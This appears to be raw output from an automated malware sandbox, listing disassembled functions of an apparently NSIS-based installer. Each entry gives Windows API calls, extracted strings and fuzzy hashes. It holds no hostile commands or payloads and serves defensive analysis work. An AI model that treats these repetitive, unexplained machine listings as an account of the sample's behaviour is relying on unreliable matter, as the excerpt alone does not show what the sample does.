                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: \*.*
                                                                            • API String ID: 2035342205-1173974218
                                                                            • Opcode ID: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                                            • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                                            • Opcode Fuzzy Hash: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                                            • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                                            • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                                            • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                                            • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00436800,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,00436800,?,76232EE0,004057F0,?,00436800,76232EE0), ref: 00406296
                                                                            • FindClose.KERNEL32(00000000), ref: 004062A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID: 8WB
                                                                            • API String ID: 2295610775-3088156181
                                                                            • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                            • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                                            • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                            • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                                            • GetClientRect.USER32(?,?), ref: 004053DC
                                                                            • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                                            • ShowWindow.USER32(?,?), ref: 00405480
                                                                            • GetDlgItem.USER32(?,?), ref: 004054A1
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                                            • GetDlgItem.USER32(?,?), ref: 004053AE
                                                                              • Part of subcall function 004041CF: SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD
                                                                            • GetDlgItem.USER32(?,?), ref: 004054F3
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405508
                                                                            • ShowWindow.USER32(00000000), ref: 0040552C
                                                                            • ShowWindow.USER32(?,?), ref: 00405531
                                                                            • ShowWindow.USER32(?), ref: 0040557B
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                                            • CreatePopupMenu.USER32 ref: 004055C0
                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                                            • GetWindowRect.USER32(?,?), ref: 004055F4
                                                                            • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 0040560D
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                            • OpenClipboard.USER32(00000000), ref: 00405655
                                                                            • EmptyClipboard.USER32 ref: 0040565B
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                                            • CloseClipboard.USER32 ref: 004056B6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                            • String ID: {$&B
                                                                            • API String ID: 590372296-2518801558
                                                                            • Opcode ID: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                                            • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                                            • Opcode Fuzzy Hash: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                                            • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                                            • ShowWindow.USER32(?), ref: 00403D1B
                                                                            • DestroyWindow.USER32 ref: 00403D2F
                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                                            • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                                            • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                                            • EnableWindow.USER32(?,?), ref: 00403F83
                                                                            • EnableWindow.USER32(?,?), ref: 00403F9E
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                                            • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                                            • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403FD3
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                                            • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                                            • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                            • String ID: &B
                                                                            • API String ID: 184305955-3208460036
                                                                            • Opcode ID: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                                            • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                                            • Opcode Fuzzy Hash: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                                            • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E
                                                                            APIs
                                                                              • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
                                                                              • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062CF
                                                                              • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                                            • lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800,76233420,00000000,00434000), ref: 004039A0
                                                                            • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800), ref: 00403A20
                                                                            • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                                            • GetFileAttributesW.KERNEL32(004271A0), ref: 00403A3E
                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403A87
                                                                              • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                            • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                                            • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403ADC
                                                                            • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                                            • LoadLibraryW.KERNEL32(RichEd20), ref: 00403B58
                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                                            • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                                            • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                                            • API String ID: 914957316-1918744475
                                                                            • Opcode ID: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                                            • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                                            • Opcode Fuzzy Hash: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                                            • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D
                                                                            APIs
                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                                            • GetDlgItem.USER32(?,?), ref: 004043E9
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                                            • GetSysColor.USER32(?), ref: 00404417
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                                            • lstrlenW.KERNEL32(?), ref: 00404438
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                                            • SendMessageW.USER32(00000000), ref: 004044BA
                                                                            • GetDlgItem.USER32(?,?), ref: 004044E5
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                                            • SetCursor.USER32(00000000), ref: 00404539
                                                                            • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                                            • SetCursor.USER32(00000000), ref: 0040455D
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                                            • SendMessageW.USER32(?,00000000,00000000), ref: 0040459E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                            • String ID: N$open
                                                                            • API String ID: 3615053054-904208323
                                                                            • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                                            • Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
                                                                            • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                                            • Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99
                                                                            APIs
                                                                            • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                                            • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                                              • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                                              • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                                            • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                                            • wsprintfA.USER32 ref: 00405CDE
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,?,00426588,?,?,?,?,?), ref: 00405D19
                                                                            • GlobalAlloc.KERNEL32(?,0000000A), ref: 00405D28
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                                            • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                                              • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                                              • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                            • String ID: %ls=%ls$NUL$[Rename]
                                                                            • API String ID: 1265525490-899692902
                                                                            • Opcode ID: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                                            • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                                            • Opcode Fuzzy Hash: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                                            • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                            • DrawTextW.USER32(00000000,00428200,000000FF,00000010,?), ref: 00401156
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                                            • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                                            • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                                            • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                                            • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 0040479C
                                                                            • lstrcatW.KERNEL32(?,004271A0), ref: 004047A8
                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                                              • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,?,004047F1), ref: 0040571B
                                                                              • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 0040623F
                                                                              • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                                              • Part of subcall function 004061DC: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406253
                                                                              • Part of subcall function 004061DC: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76233420,00403542), ref: 00406266
                                                                            • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                                            • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                            • String ID: A$&B
                                                                            • API String ID: 2246997448-2586977930
                                                                            • Opcode ID: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
                                                                            • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                                            • Opcode Fuzzy Hash: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
                                                                            • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00402DD0
                                                                            • GetModuleFileNameW.KERNEL32(00000000,00437800,?), ref: 00402DEC
                                                                              • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                                              • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                                            • GlobalAlloc.KERNEL32(?,00409230), ref: 00402F7C
                                                                            Strings
                                                                            • Error launching installer, xrefs: 00402E0C
                                                                            • Inst, xrefs: 00402EA3
                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                            • Null, xrefs: 00402EB5
                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                            • soft, xrefs: 00402EAC
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.4016358350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.4016341533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016372457.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016389160.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.4016422024.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                            • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                            • API String ID: 2803837635-787788815
                                                                            • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                                            • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                                            • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                                            • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD
                                                                            APIs
                                                                            • GetVersion.KERNEL32(00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 0040602D
                                                                            • GetSystemDirectoryW.KERNEL32(004271A0,?), ref: 004060AB
                                                                            • GetWindowsDirectoryW.KERNEL32(004271A0,?), ref: 004060BE
                                                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
